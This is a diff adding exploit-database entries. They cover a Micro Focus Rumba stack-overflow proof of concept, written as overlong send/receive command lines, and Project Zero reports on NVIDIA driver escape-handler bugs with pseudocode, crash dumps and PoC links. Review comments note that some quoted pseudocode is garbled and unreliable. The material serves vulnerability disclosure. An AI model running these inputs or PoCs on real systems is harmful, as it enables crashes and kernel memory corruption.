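Review bot: The value read into `ftp_ip` is never used, because the next statement connects with the hard-coded `FTP('127.0.0.1')`, so the prompt is misleading. Since the reproducer only ever talks to loopback, I would drop the `raw_input` line and state that in a comment, e.g. `# connects to a local FreeFTPD test instance on 127.0.0.1 only`. The output is also unreliable for anyone using the script to confirm a fix: `print ftp.login` prints the bound method object rather than the server's login reply, and `SERVER KILLED` is printed before the MKD request is sent and regardless of its outcome, so a patched server is reported the same way as a crashed one. The script is Python 2 only (`print` statements, `raw_input`), which the header comment should say.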
@@ -0,0 +1,58 @@ +# Exploit Title: Micro Focus Rumba 9.4 Multiple Local Stack-overflow +# Date: 29-10-2016 +# Exploit Author: Umit Aksu +# Vendor Homepage: http://www.microfocus.com/ +# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231 +# Version: 9.4 +# Tested on: Internet Explorer 11 on windows 7 +# CVE : + + +1. Description + +Multiple local stack overflow vulnerabilities which can used when to exploit when learning exploit development. + +Note: Rumba uses send.exe and receive.exe to send and receive files so it might be possible to exploit this remotely. + + +2. Proof of Concept + +The code below sprayes the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you. + + +C:\Program Files (x86)\Micro Focus\RUMBA\System>send c:\aaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaa C:\dddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd 
+ddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +RUMBA Command-line File Transfer Utility + +SEH + NSEH overwritten + + +C:\Program Files (x86)\Micro Focus\RUMBA\System>receive.exe c:\aaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaa C:\dddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd +ddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +RUMBA Command-line File Transfer Utility \ No newline at end of file diff --git a/platforms/windows/dos/40649.html b/platforms/windows/dos/40649.html new file mode 100755 index 000000000..aa68ae044 --- /dev/null +++ b/platforms/windows/dos/40649.html 
@@ -0,0 +1,102 @@ +# Exploit Title: Micro Focus Rumba <= 9.3 ActiveX Stack-based buffer overflow +# Date: 29-10-2016 +# Exploit Author: Umit Aksu +# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28600.micro-focus-rumba-9-x-security-update.aspx +# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231 +# Version: <= 9.3 +# Tested on: Internet Explorer 11 on windows 7 +# CVE : CVE-2016-5228 + + + +1. Description +Stack-based buffer overflow in the PlayMacro function in ObjectXMacro.ObjectXMacro in WdMacCtl.ocx in Micro Focus Rumba 9.x before 9.3 HF 11997 and 9.4.x before 9.4 HF 12815 allows remote attackers to execute arbitrary code via a long MacroName argument. + + +2. Proof of Concept + +The code below sprays the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you. + + + + + + + + + + +
+ + + + + + + + + + + + diff --git a/platforms/windows/dos/40656.txt b/platforms/windows/dos/40656.txt new file mode 100755 index 000000000..51404a6be --- /dev/null +++ b/platforms/windows/dos/40656.txt 
@@ -0,0 +1,59 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=892
+
+The handler for the DxgkDdiEscape escape code 0x70000D4 has the following pseudocode:
+
+void __fastcall escape_70000D4(NvMiniportDeviceContext *a1, NvEscapeData *a2)
+{
+ Escape70000D4 *escape_data_; // rbx@1
+ PVOID alloc_buf; // rsi@1
+ unsigned int v4; // edi@1
+ __int64 user_ptr; // r14@4
+ DWORD *v6; // rbx@5
+ __int128 v7; // [rsp+40h] [rbp-38h]@1
+ __int128 v8; // [rsp+50h] [rbp-28h]@4
+ PVOID alloc_buf_; // [rsp+60h] [rbp-18h]@4
+
+ escape_data_ = (Escape70000D4 *)a2;
+ a2->unknown_rest[6] = 1;
+ LODWORD(v7) = 0;
+ memset((char *)&v7 + 4, 0, 0x24ui64);
+ alloc_buf = ExAllocatePoolWithTag_(PagedPool, escape_data_->user_ptr_size, 'paVN');
+ v4 = 0;
+ if ( !alloc_buf )
+ v4 = 0xFFFF;
+ if ( v4 )
+ goto LABEL_12;
+ HIDWORD(v8) = escape_data_->user_ptr_size;
+ alloc_buf_ = alloc_buf;
+ v4 = sub_625BC(0i64, dword_B1BB94, escape_data_->unknown_0, 0x83F30101, (__int64)&v7, 40);
+ user_ptr = escape_data_->user_ptr;
+ ProbeForWrite((PVOID)escape_data_->user_ptr, escape_data_->user_ptr_size, UserMode);
+ memcpy((void *)escape_data_->user_ptr, alloc_buf, escape_data_->user_ptr_size);
+ *(_OWORD *)&escape_data_->unknown_2 = v7;
+ *(_OWORD *)&escape_data_->unknown_4 = v8;
+ escape_data_->user_ptr = user_ptr;
+ if ( v4 )
+ {
+LABEL_12:
+ v6 = &escape_data_->header.unknown_rest[6];
+ if ( v6 )
+ {
+ if ( v4 <= 0xFFFFF000 )
+ *v6 = -4096 - v4;
+ }
+ }
+ if ( alloc_buf )
+ ExFreePoolWithTag_(alloc_buf, 0x7061564Eu);
+}
+
+ExAllocatePoolWithTag is called with a user provided size to allocate a buffer, but the subsequent copying of said buffer to the user provided pointer doesn't make sense since the buffer is never initialised with any values. This means that a user mode program can leak uninitialised memory from arbitrarily-sized pool allocations.
+
+########
+
+Looks like I made an oversimplified analysis of the pseudocode in the report.
The allocated buffer pointer is indeed passed off to the sub_625BC function (as part of a struct member on the stack) which eventually passes it to a bunch of other functions.
+
+However, this doesn't change the fact that with the provided PoC, the pool allocated buffer still isn't being initialised and is copied into the user buffer unchanged.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40656.zip
diff --git a/platforms/windows/dos/40657.txt b/platforms/windows/dos/40657.txt
new file mode 100755
index 000000000..c217c4b43
--- /dev/null
+++ b/platforms/windows/dos/40657.txt
@@ -0,0 +1,47 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=894
+
+The DxgkDdiEscape handler for 0x700010d accepts a user provided pointer as the
+destination for a memcpy call, without doing any checks on said pointer.
+
+void __fastcall escape_700010D(NvMiniportDeviceContext* ctx, NvEscapeData *escape)
+{
+ ...
+ v8 = escape->unknown_2;
+ if ( v8 == 1 )
+ {
+ data.size = escape->size;
+ data.buf = ExAllocatePoolWithTag((POOL_TYPE)512, 0xC08i64 * data.size, 0x7061564Eu);
+ v9 = Escape7Handler(0i64, dword_7DCB84, dword_7DCB84, 626, &data, 0x190);
+ }
+
+ ...
+ else if ( escape->unknown_2 == 1 )
+ {
+ memcpy(escape->user_ptr, data.buf, 3080i64 * escape->size);
+
+
+(Win 10 x64 372.54) crashing context with PoC (in memcpy) on a write to 0x4141414141414141:
+
+SYSTEM_SERVICE_EXCEPTION (3b)
+...
+CONTEXT: ffffd0002d2ab5c0 -- (.cxr 0xffffd0002d2ab5c0)
+rax=0000000000000001 rbx=ffffc0016c9b9b40 rcx=000000000000000f
+rdx=bebe9ebf4b4e0ecf rsi=0000000000000001 rdi=000000007061564e
+rip=fffff8005488ab00 rsp=ffffd0002d2abfe8 rbp=ffffd0002d2ac0f0
+ r8=0000000000000bf9 r9=ffffd00024014ac0 r10=0000000000000000
+r11=4141414141414141 r12=0000000000000340 r13=fffff800542b0000
+r14=ffffe0008fb2d000 r15=0000000000000001
+iopl=0 nv up ei pl nz ac po nc
+cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010216
+nvlddmkm+0x5dab00:
+fffff800`5488ab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=????????????????????????????????
+
+To reproduce, compile the PoC as a x64 binary (requires linking with
+setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
+as for it to work as the escape data must contain the right values (e.g. a
+field that appears to be gpu bus device function). My PoC should hopefully set
+all the right values for the machine it's running on.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40657.zip
diff --git a/platforms/windows/dos/40658.txt b/platforms/windows/dos/40658.txt
new file mode 100755
index 000000000..ba988f0e6
--- /dev/null
+++ b/platforms/windows/dos/40658.txt
@@ -0,0 +1,57 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=895
+
+The DxgkDdiEscape handler for 0x7000194 doesn't do bounds checking with the
+user provided lengths it receives. When these lengths are passed to memcpy,
+overreads and memory corruption can occur.
+
+void __fastcall escape_7000194(NvMiniportDeviceContext *ctx, Escape7000194 *escape_data)
+ ...
+
+ alloc_0_ = ExAllocatePoolWithTag_(PagedPool, escape->size_0, 0x7061564Eu);
+
+ ...
+
+ alloc_1 = ExAllocatePoolWithTag_(PagedPool, escape->size_1, 0x7061564Eu);
+
+ ..
+
+ if ( (_BYTE)v11 ) {
+ memcpy(alloc_0, escape->buf_0, escape->size_0);
+ memcpy(alloc_1, escape->buf_2, escape->size_1);
+ }
+ v8 = Escape7Handler(0i64, dword_7DCB84, *(_DWORD *)(v3 + 24), 0x402C0105, &escape->data, 96);
+ v9 = v8;
+ if ( !(_BYTE)v11 && !v8 )
+ memcpy(escape->buf_0, alloc_0, escape->size_0);
+
+ ...
+
+The PoC I've provided causes an OOB read, but it should be possible to pass an
+input that results in the third memcpy being executed instead of the first two,
+which leads to kernel memory corruption (OOB write).
+
+(Win 10 x64 372.54) crashing context with PoC:
+
+PAGE_FAULT_IN_NONPAGED_AREA (5)
+...
+Some register values may be zeroed or incorrect.
+rax=0000000000000007 rbx=0000000000000000 rcx=ffffc000f5220f80
+rdx=fffffffff3d5509c rsi=0000000000000000 rdi=0000000000000000
+rip=fffff8007d4dad66 rsp=ffffd00166b9d2a8 rbp=ffffc000e8f55038
+ r8=0000000000020fc0 r9=000000000006603e r10=0000000000020000
+r11=ffffc000f5200000 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0 nv up ei pl nz na pe nc
+nvlddmkm+0x5dad66:
+fffff800`7d4dad66 f30f6f4c0ae0 movdqu xmm1,xmmword ptr [rdx+rcx-20h] ds:ffffc000`e8f75ffc=????????????????????????????????
+Resetting default scope
+
+To reproduce, compile the PoC as a x64 binary (requires linking with
+setupapi.lib, and WDK for D3DKMTEscape), and run.
It may require some changes
+as for it to work as the escape data must contain the right values (e.g. a
+field that appears to be gpu bus device function). My PoC should hopefully set
+all the right values for the machine it's running on.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40658.zip
diff --git a/platforms/windows/dos/40659.txt b/platforms/windows/dos/40659.txt
new file mode 100755
index 000000000..fddbac413
--- /dev/null
+++ b/platforms/windows/dos/40659.txt
@@ -0,0 +1,30 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=911
+
+The DxgkDdiEscape handler for 0x600000D passes an unchecked user provided
+pointer as the destination for a memcpy call. This leads to kernel memory
+corruption.
+
+(Win 10 x64 372.54) crashing context with PoC:
+
+SYSTEM_SERVICE_EXCEPTION (3b)
+CONTEXT: ffffd000c076c8b0 -- (.cxr 0xffffd000c076c8b0)
+rax=0000000000000880 rbx=0000000000000000 rcx=000000000000000f
+rdx=bebe9ec057cc7d47 rsi=ffffd000c076d870 rdi=ffffe001990da008
+rip=fffff8010f1eab00 rsp=ffffd000c076d2d8 rbp=ffffd000c076d360
+ r8=0000000000003ff1 r9=fffff8010f217d48 r10=fffff78000000008
+r11=4141414141414141 r12=0000000000000000 r13=ffffe001990dbe88
+r14=ffffe001945f1201 r15=0000000000004000
+iopl=0 nv up ei pl nz ac pe nc
+cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010212
+nvlddmkm+0x5dab00:
+fffff801`0f1eab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=????????????????????????????????
+Resetting default scope
+
+To reproduce, compile the PoC as a x64 binary (requires WDK for D3DKMTEscape),
+and run.
+
+For completeness, it looks like many of the other escape handlers in the same function has similar issues with writing to user provided pointers in an unchecked way. This should have been fairly obvious as the code is very close to each other in the same function.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40659.zip
diff --git a/platforms/windows/dos/40661.txt b/platforms/windows/dos/40661.txt
new file mode 100755
index 000000000..ac4010ebe
--- /dev/null
+++ b/platforms/windows/dos/40661.txt
@@ -0,0 +1,48 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=927
+
+The DxgkDdiEscape handler for escape code 0x100010b looks like:
+
+char escape_100010b(NvMiniportDeviceContext *miniport_context, HANDLE handle, unsigned int idx)
+{
+ PVOID *Object;
+ if ( !handle )
+ do_debug_thingo();
+ Object = (PVOID *)&miniport_context->UNKNOWN[8 * idx + 22696];
+ if ( !ObReferenceObjectByHandle(handle_, SYNCHRONIZE, )ExEventObjectType, UserMode, Object, 0i64) )
+ {
+ result = 0;
+ if ( *Object )
+ result = UserMode;
+ }
+ return result;
+}
+
+It essentially takes in a user mode event handle from userspace, and calls
+ObReferenceObjectByHandle on it, writing the object pointer to |Object|. Note
+that the kernel implementation of ObReferenceObjectByHandle always begins with
+writing NULL to this pointer regardless of whether or not the handle is valid.
+
+|Object| is calculated using a user provided index that is not bounds checked,
+leading to OOB write of either NULL or the KEVENT pointer:
+
+Object = (PVOID *)&miniport_context_->UNKNOWN[8 * idx + 22696];
+
+The attached PoC causes the following crashing context on Win x64 372.54:
+
+PAGE_FAULT_IN_NONPAGED_AREA (50)
+...
+rax=ffffe0025ea28f50 rbx=0000000000000000 rcx=0000000000000000
+rdx=0000000000100000 rsi=0000000000000000 rdi=0000000000000000
+rip=fffff801d8f3daf5 rsp=ffffd000203deda0 rbp=0000000000000001
+ r8=ffffe000506d4b50 r9=ffffe000524fb201 r10=0000000000000000
+r11=ffffd000203df370 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0 nv up ei pl zr na po nc
+nt!ObReferenceObjectByHandleWithTag+0x45:
+fffff801`d8f3daf5 488908 mov qword ptr [rax],rcx ds:ffffe002`5ea28f50=????????????????
+
+To reproduce, compile as a x64 executable and run (requires WDK for D3DKMTEscape).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40661.zip
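Review bot: The quoted pseudocode for `escape_100010b` does not parse as written: the call reads `ObReferenceObjectByHandle(handle_, SYNCHRONIZE, )ExEventObjectType, ...`, which looks like a cast that lost its type in transcription, and it mixes `handle`/`handle_` and `miniport_context`/`miniport_context_` and returns an undeclared `result`. The listing exists to show that `idx` reaches `&miniport_context->UNKNOWN[8 * idx + 22696]` with no range check, so I would restore it from the linked source issue to make the missing check unambiguous. 40667.txt has a similar slip in `for (DWORD i = 0; < escape->num_data; ++i)`, where the loop variable is missing from the condition.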
diff --git a/platforms/windows/dos/40662.txt b/platforms/windows/dos/40662.txt
new file mode 100755
index 000000000..be81661e2
--- /dev/null
+++ b/platforms/windows/dos/40662.txt
@@ -0,0 +1,41 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=936
+
+The DxgkDdiEscape handler for 0x7000170 lacks proper bounds checks for the variable size
+input escape data, and relies on a user provided size as the upper bound for writing output.
+
+Crashing context with PoC (Win 10 x64 with 372.54):
+
+KERNEL_SECURITY_CHECK_FAILURE (139)
+A kernel component has corrupted a critical data structure. The corruption
+could potentially allow a malicious user to gain control of this machine.
+...
+
+rax=fffff801f417e600 rbx=0000000000000000 rcx=0000000000000002
+rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
+rip=fffff801f4152b75 rsp=ffffd000287b4468 rbp=ffffd000287b53e8
+ r8=fffff801f4169e24 r9=ffffd000287b5620 r10=ffffd000287b5620
+r11=0000000000000450 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0 nv up ei ng nz ac pe nc
+dxgkrnl!_report_gsfailure+0x5:
+fffff801`f4152b75 cd29 int 29h
+Resetting default scope
+
+EXCEPTION_RECORD: ffffd000287b4228 -- (.exr 0xffffd000287b4228)
+ExceptionAddress: fffff801f4152b75 (dxgkrnl!_report_gsfailure+0x0000000000000005)
+ ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
+ ExceptionFlags: 00000001
+NumberParameters: 1
+ Parameter[0]: 0000000000000002
+Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
+
+To reproduce, compile the PoC as a x64 binary (requires linking with
+setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
+as for it to work as the escape data must contain the right values (e.g. a
+field that appears to be gpu bus device function). My PoC should hopefully set
+all the right values for the machine it's running on.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40662.zip
+
diff --git a/platforms/windows/dos/40663.txt b/platforms/windows/dos/40663.txt
new file mode 100755
index 000000000..51e27a71d
--- /dev/null
+++ b/platforms/windows/dos/40663.txt
@@ -0,0 +1,42 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=937
+
+The DxgkDdiEscape handler for 0x5000027 accepts a user provided pointer,
+but does no checks on it before using it.
+
+...
+ DWORD* user_ptr = escape_5000027_data->user_ptr;
+ v32 = user_ptr[2];
+ v33 = user_ptr + 3;
+ if ( v32 != -1 )
+ v33 = (_DWORD *)v32;
+ sub_91C24(miniport_context_, *user_ptr, user_ptr[1], v33, (__int64)&escape_data_);
+...
+
+The PoC I’ve provided causes a read on said pointer, but based on inspecting where this pointer
+is passed it seems like there is at least 1 code path that can result in a write (I haven't
+confirmed this though).
+
+(On Win 10 x64 with 372.54)
+
+FAULTING_IP:
+nvlddmkm!nvDumpConfig+1338c7
+fffff801`8a26a79f 8b4808 mov ecx,dword ptr [rax+8]
+
+CONTEXT: ffffd00023649970 -- (.cxr 0xffffd00023649970)
+rax=4141414141414141 rbx=ffffd0002364a870 rcx=0000000005000017
+rdx=ffffd0002364a498 rsi=0000000000000000 rdi=ffffd0002364a498
+rip=fffff8018a26a79f rsp=ffffd0002364a390 rbp=ffffd0002364a4a9
+ r8=ffffd0002364a870 r9=ffffe8023c537220 r10=0000000000000000
+r11=ffffd0002364a370 r12=ffffe8023c537220 r13=fffff80189fa9370
+r14=ffffe000d6f2a000 r15=ffffe8023c537220
+iopl=0 nv up ei pl zr na po nc
+cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246
+nvlddmkm!nvDumpConfig+0x1338c7:
+fffff801`8a26a79f 8b4808 mov ecx,dword ptr [rax+8] ds:002b:41414141`41414149=????????
+Resetting default scope
+
+To reproduce, compile PoC as a x64 executable and run (requires WDK for D3DKMTEscape).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40663.zip
diff --git a/platforms/windows/dos/40664.txt b/platforms/windows/dos/40664.txt
new file mode 100755
index 000000000..cfe9672e2
--- /dev/null
+++ b/platforms/windows/dos/40664.txt
@@ -0,0 +1,48 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=940
+
+The DxgkDdiEscape handler for 0x70001b2 doesn't do proper bounds checks for its
+variable size input.
+
+void sub_8C4304(...) {
+ ...
+ // escape_->size is controlled by the user.
+ if ( escape_->size < size )
+ size = escape_->size;
+ memcpy(escape_->data, v31, 28i64 * size);
+ ...
+}
+
+Note that this appears to be a common pattern. Normally, before
+escape handlers are executed, |PrivateDriverDataSize| (from DXGKARG_ESCAPE)
+is checked to be equal to some value against a hardcoded table. However, some escapes
+allow a more relaxed check that |PrivateDriverDataSize| >= minimum. This means that
+the handler themselves must implement an ad hoc bounds check, which either seems to be
+missing or implemented incorrectly (relying on a user specified value) in many cases.
+
+bug 936 is a similar issue and there are likely more. I've noticed (but not confirmed)
+a few more OOB reads that I haven't reported that follow this same pattern.
+
+Crashing context with PoC (Win 10 x64 with 372.54):
+
+PAGE_FAULT_IN_NONPAGED_AREA (50)
+Invalid system memory was referenced. This cannot be protected by try-except.
+Typically the address is just plain bad or it is pointing at freed memory.
+Arguments:
+...
+rax=ffffd000239d51dc rbx=0000000000000000 rcx=fffffffffffffff4
+rdx=fffff000e9e6c754 rsi=0000000000000000 rdi=0000000000000000
+rip=fffff80166d6aca0 rsp=ffffd000239d3df8 rbp=ffffd000239d3f00
+ r8=0000000000000924 r9=000000000000003b r10=000000000000e9ef
+r11=ffffd000239d48ac r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0 nv up ei ng nz ac pe cy
+nvlddmkm+0x5daca0:
+fffff801`66d6aca0 f30f7f40f0 movdqu xmmword ptr [rax-10h],xmm0 ds:ffffd000`239d51cc=????????????????????????????????
+Resetting default scope
+
+To reproduce, compile as an x64 executable an run (requires WDK for D3DKMTEscape).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40664.zip
+
diff --git a/platforms/windows/dos/40665.txt b/platforms/windows/dos/40665.txt
new file mode 100755
index 000000000..f226290bd
--- /dev/null
+++ b/platforms/windows/dos/40665.txt
@@ -0,0 +1,60 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=942
+
+The DxgkDdiEscape handler for escape 0x100009a lacks proper bounds checks:
+
+case 0x100009A:
+ ...
+ size_0 = escape_data->size_1;
+ ...
+ size_1 = 2 - (escape_data->unknown < 18);
+ ...
+ size_2 = escape_data->size_2;
+ ...
+ total_size = size_0 * size_1 * size_2;
+ ...
+
+ if (total_size > 0x10)
+ do_debug_thingo();
+
+ if (total_size) {
+ DWORD* ptr = alloced_buf + 24;
+ DWORD* user_buf = escape_data->data;
+ ...
+ while (total_size) {
+ *(ptr - 1) = *(user_buf - 1);
+ *ptr = *user_buf;
+ ...
+ user_buf += 4;
+ ptr += 39;
+ --total_size;
+ }
+
+There is a check that total_size > 0x10, which calls some kind of a
+debug/logging function (do_debug_thingo in my pseudocode), but it does not
+actually stop processing of the escape. This leads to buffer overflow on the
+allocated pool buffer later on.
+
+Note that there is also a potential integer overflow in the calculation of
+|total_size|. Since the individual sizes (size_0, size_1, size_2) appear to be
+stored in a struct and eventually passed off to another function, there may be
+more problems later on too.
+
+Crashing context with PoC (Win10 x64 with 372.54):
+
+PAGE_FAULT_IN_NONPAGED_AREA (50)
+Invalid system memory was referenced. This cannot be protected by try-except.
+Typically the address is just plain bad or it is pointing at freed memory.
+...
+rax=00000000caa6ed30 rbx=0000000000000000 rcx=ffffc001cd337044
+rdx=00000000000f41bd rsi=0000000000000000 rdi=0000000000000000
+rip=fffff80102461188 rsp=ffffd000243bbed0 rbp=ffffd000243bbfd0
+ r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
+r11=0000000000000000 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0 nv up ei pl nz na po nc
+nvlddmkm!nvDumpConfig+0x12a2b0:
+fffff801`02461188 8941fc mov dword ptr [rcx-4],eax ds:ffffc001`cd337040=????????
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40665.zip
diff --git a/platforms/windows/dos/40666.txt b/platforms/windows/dos/40666.txt
new file mode 100755
index 000000000..42946bfa3
--- /dev/null
+++ b/platforms/windows/dos/40666.txt
@@ -0,0 +1,56 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=944
+
+The DxgkDdiEscape handler for 0x70000d5 lacks bounds checks:
+
+ ...
+
+ if ( g_saved_size )
+ {
+ escape->size = g_saved_size;
+ if ( (unsigned int)g_saved_size > 0 )
+ {
+ do
+ {
+ v5 = v2++;
+ escape->data[v5] = global_array[v5 + 77];
+ }
+ while ( v2 < g_saved_size );
+ }
+ return;
+ }
+ data = 0i64;
+
+
+ ...
+ if ( escape->size > 0 )
+ {
+ do
+ {
+ ii = i++;
+ global_array[ii + 77] = escape->data[ii];
+ }
+ while ( i < escape->size );
+
+ ...
+ g_saved_size = escape->size;
+
+This handler copies data to/from a global array, but lacks any form of bounds checking, as
+|escape->size| is controlled by the user. This leads to overflow of the global buffer, and pool overflows
+when it's copied back into the escape data.
+
+A PoC is attached that should cause a crash (Win 10 x64, 372.54):
+
+KERNEL_SECURITY_CHECK_FAILURE (139)
+A kernel component has corrupted a critical data structure. The corruption
+could potentially allow a malicious user to gain control of this machine.
+Arguments:
+Arg1: 0000000000000002, Stack cookie instrumentation code detected a stack-based
+ buffer overrun.
+Arg2: ffffd00022de52c0, Address of the trap frame for the exception that caused the bugcheck
+Arg3: ffffd00022de5218, Address of the exception record for the exception that caused the bugcheck
+Arg4: 0000000000000000, Reserved
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40666.zip
+
diff --git a/platforms/windows/dos/40667.txt b/platforms/windows/dos/40667.txt
new file mode 100755
index 000000000..8dd65ea0c
--- /dev/null
+++ b/platforms/windows/dos/40667.txt
@@ -0,0 +1,31 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=946
+
+There is a missing bounds check in inner loop of the escape handler for 0x7000014
+that leads to a stack buffer overflow:
+
+...
+for (DWORD i = 0; < escape->num_data; ++i) {
+ ...
+ // size is user controlled.
+ size = escape->data[i].size;
+ for (DWORD j = 0; j < size; ++j) {
+ stack_buf[j] = escape->data[...];
+ }
+}
+
+The attached PoC gives me the following crashing context (Win 10 x64, 372.54):
+
+DRIVER_OVERRAN_STACK_BUFFER (f7)
+A driver has overrun a stack-based buffer. This overrun could potentially
+allow a malicious user to gain control of this machine.
+...
+ffffd000`23f94a78 fffff801`6e5deaf2 : ffffd000`23f95270 00000000`000000f7 ffffd000`23f94be0 fffff801`6e43c848 : nt!DbgBreakPointWithStatus
+ffffd000`23f94a80 fffff801`6e5de4c3 : 00000000`00000003 ffffd000`23f94be0 fffff801`6e56c600 00000000`000000f7 : nt!KiBugCheckDebugBreak+0x12
+ffffd000`23f94ae0 fffff801`6e55fa44 : 00000000`00000000 00000000`00000000 ffffc001`c8e7202c fffff801`6e7188b8 : nt!KeBugCheck2+0x893
